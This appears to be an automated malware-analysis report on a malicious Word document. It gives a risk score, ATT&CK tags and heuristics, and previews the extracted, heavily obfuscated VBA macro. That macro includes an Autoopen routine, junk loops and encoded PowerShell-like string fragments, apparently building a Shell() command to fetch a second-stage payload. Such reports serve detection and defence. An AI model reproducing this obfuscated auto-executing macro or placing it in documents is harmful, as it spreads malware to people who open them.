MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a Microsoft Office document containing a critical heuristic firing for a Shell() call within VBA macros. The AutoOpen macro is present, indicating it executes automatically upon opening. While the VBA code is heavily obfuscated, the presence of the Shell() call strongly suggests an intent to execute arbitrary commands, likely to download and run a second-stage payload. No specific family could be identified due to the obfuscation.
Heuristics 5
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 187280 bytes |
SHA-256: 009c17f2690e79b829fc30d795ea06b5fd9c12eafa0337666e627d870802aed1 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "GRRvLCFN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub XjjdbV(FQIZIt)
For wKbMF = 42537 To 10028
For iiAja = 5970 To LrauC
iSCdqf = ChrB(YSFoK)
Next
YnzvMu = 40392 * 20810
wcsvr = ERzNra + sZiPq
Next
End Sub
Sub oMdMY(ijMvNA)
For ijUZlu = 76612 To 37161
For AFaTO = 17387 To aMzDRW
VQULMw = ChrB(VmNKwi)
Next
AzVDk = 38581 * 22986
lEVVo = jQzPHr + IRjbVb
Next
For TNJSaX = 50695 To 29566
For AjCdwi = 29555 To rJGmVQ
prZrjl = ChrB(PshDYv)
Next
vQLTo = 93613 * 68145
NAdBt = LVrzzP + jwijpY
Next
For KwuGU = 72495 To 92194
For uShTKk = 58065 To NirrD
pFbfa = ChrB(SckwY)
Next
uRFXh = 15851 * 77152
bYQiE = EZVEzj + oGofo
Next
End Sub
Sub jaRii(spNTpw)
For DlvQpz = 51975 To 66166
For sHfAr = 9833 To KQssz
sJqhi = ChrB(CrGfI)
Next
ccspz = 65310 * 26027
chKCiD = jCCzDm + tlaIOO
Next
For PmcXmO = 55933 To 26063
For RKfVb = 20006 To ozfYTp
iEbdj = ChrB(PrTww)
Next
vhivo = 19638 * 42018
kmYRYi = lIipMZ + tTKluG
Next
End Sub
Sub Autoopen()
On Error Resume Next
For aqjYN = 28210 To 34064
For DqOzI = 37536 To fKEAVd
kIknOo = ChrB(kDQPa)
Next
vrsLT = 38466 * 51941
sbPRO = nAjtkc + GXoZAd
Next
LDsnjtzzMnH (TmwhhI + fTiLFLOrV + nRtjB)
For dshUW = 99628 To 80872
For kXWfw = 35907 To UElTqb
GchjFz = ChrB(imNiZO)
Next
pTDAn = 55394 * 67586
cBjqK = NINLb + mFnmus
Next
End Sub
Sub BkJzY(biliS)
For wCqAf = 1224 To 28691
For jVdAWw = 42955 To kjQGvG
iSEKlj = ChrB(cauIcp)
Next
FHlfFq = 60768 * 13421
aaiAu = RMHsU + hbqcD
Next
For tDFOVj = 61653 To 59119
For fapPC = 44720 To ijDjv
IiBkU = ChrB(XjvCCA)
Next
DDMFBU = 29948 * 60936
lSdSpX = GYUvWu + NkLzG
Next
For jXnPQU = 10874 To 34302
For CPfrWw = 67309 To CtAip
iEPIhz = ChrB(pWImC)
Next
iNCVS = 60396 * 54756
EPiYZ = iJDGKu + FKALYS
Next
End Sub
Sub NsWEU(EsAYiD)
For Hdokk = 14442 To 40070
For jTCcHT = 49277 To BJtMT
MtZDq = ChrB(lIfYG)
Next
mbWPbQ = 96099 * 36101
ZUcMPi = zOoqtw + vLjRu
Next
End Sub
Attribute VB_Name = "XndVZjz"
Sub licOAc(Yzravv)
For QjPoo = 20688 To 51822
For vzDNJ = 72049 To GmijJN
LctWdW = ChrB(oqzKN)
Next
tGlsn = 11342 * 63087
cLnSBi = FrOmwk + nvSjE
Next
End Sub
Function fTiLFLOrV()
On Error Resume Next
For GJDCwO = 93535 To 241
For qtDjt = 66713 To GDcoW
wlYRmV = ChrB(qaGBp)
Next
TIkWnl = 82849 * 9159
UjPqp = pOEPU + KSiib
Next
For tbJhvL = 36629 To 59850
For UjwHz = 50439 To DIkjUu
bWUTnL = ChrB(wDwrGN)
Next
csqVA = 41412 * 50521
YFbdwR = VKFzo + LbsfTf
Next
GoEOXHE = iFtPF("B1zLOUtY+UtYbo-WAUtY+UtYq+WAqwWAq+WAqenWA'+'q(.0Gc", 1420 + 4 - 1420, 1420 + 42 - 1420)
For jzQtN = 66659 To 51954
For tKTYM = 68680 To OrJOVh
nlHZZR = ChrB(wqhpE)
Next
YoiQO = 81932 * 511
zmabzN = AVFKo + MfmoIJ
Next
For RRFtX = 336 To 16202
For mdqmY = 54719 To hjpnZ
ZWiLJ = ChrB(bRRjPK)
Next
ncsFnD = 70936 * 78304
mXdWVZ = bKBGms + bhNShE
Next
iiLsHiR = iFtPF("Tw0B 63]rahc[,UtYC4dUtY ECaLperc- 43]rahc[,UtYnFOUtYeCalpEr-)UtY}}{hUt'+'Y+Ut'+'YctUtY+UtYaUtY+UtYc}UtY+UtY;ka'+'UtY+UtYerb;)UtY+UtYCDSC4'+'UtY+UtYd()WUtY+UtYAqmetUtY+UtYI-eWhJd", 97858 + 4 - 97858, 97858 + 171 - 97858)
For zabto = 57478 To 78768
For Bkoazk = 14081 To mNBYpV
EsviR = ChrB(ZlDkG)
Next
wCdjvE = 2111 * 17239
SLuKU = aFfjfc + XBtvX
Next
For wHnDi = 15028 To 97989
For jwTsH
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.